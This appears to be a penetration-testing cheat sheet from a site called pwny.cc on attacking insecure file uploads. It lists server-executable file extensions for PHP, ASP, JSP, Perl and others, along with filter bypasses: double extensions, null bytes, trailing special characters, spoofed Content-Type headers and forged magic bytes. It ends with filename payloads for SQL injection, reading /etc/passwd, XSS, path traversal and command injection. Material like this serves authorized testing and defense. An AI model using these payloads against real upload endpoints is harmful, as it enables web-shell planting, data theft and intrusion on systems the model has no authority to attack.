pwny.cc
Search…
Insecure File Upload

Defaults extensions

PHP

1
.php
2
.php2
3
.php3
4
.php4
5
.php5
6
.php7
7
.pht
8
.shtml
9
.phps
10
.phar
11
.phpt
12
.pgif
13
.phtml
14
.phtm
15
.inc
16
.htaccess
Copied!

ASP

1
.asp
2
.aspx
3
.cer
4
.asa
5
.ashx
6
.asmx
7
.axd
8
.cshtm
9
.cshtml
10
.rem
11
.soap
Copied!

JSP

1
.jsp
2
.jspx
3
.jsw
4
.jspf
5
.jsv
6
.wss
7
.do
8
.action
Copied!

Perl

1
.pl
2
.pm
3
.cgi
4
.lib
Copied!

Coldfusion

1
.cfm
2
.cfml
3
.cfc
4
.dbm
Copied!

Flash

1
.swf
Copied!

Erland Yaws Web Server

1
.yaws
Copied!

Bypasses

Double extensions

1
file.jpg.php
2
file.php.jpg
3
file.php.blah123jpg
4
file.png.php
5
file.png.Php5
6
file.php%00.png
7
file.php%0d%0a.png
8
file.php%0a.png
9
file.php\x00.png
Copied!

Null byte

1
file.php%00.gif
2
file.php\x00.gif
3
file.php%00.png
4
file.php\x00.png
5
file.php%00.jpg
6
file.php\x00.jpg
Copied!

Special characters

1
file.php......
2
file.php%20
3
file.php%0a
4
file.php%00
5
file.php%0d%0a
6
file.php/
7
file.php.\
8
file.
9
file.pHp5....
10
file.%E2%80%AEphp.jpg
Copied!

Content-type Bypass

1
#Original name but different content-type
2
Content-Type: image/jpeg
3
Content-Type: image/gif
4
Content-Type: image/png
Copied!

Magic bytes

1
#Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application
2
PNG: \x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03[
3
JPG: \xff\xd8\xff
4
GIF: GIF87a
5
GIF: GIF8
Copied!

Triple equal

1
/?file=shell.php <-- Blocked
2
/?file===shell.php <-- Bypassed
Copied!

Filename Vulnerabilities:

1
#Time-Based SQLi Payloads
2
poc.js'(select*from(select(sleep(20)))a)+'.extension
3
4
#LFI Payloads
5
image.png../../../../../../../etc/passwd
6
7
#XSS Payloads
8
'"><img src=x onerror=alert(document.domain)>.extension
9
10
#File Traversal
11
../../../tmp/lol.png
12
13
#Command Injection
14
; sleep 10;
Copied!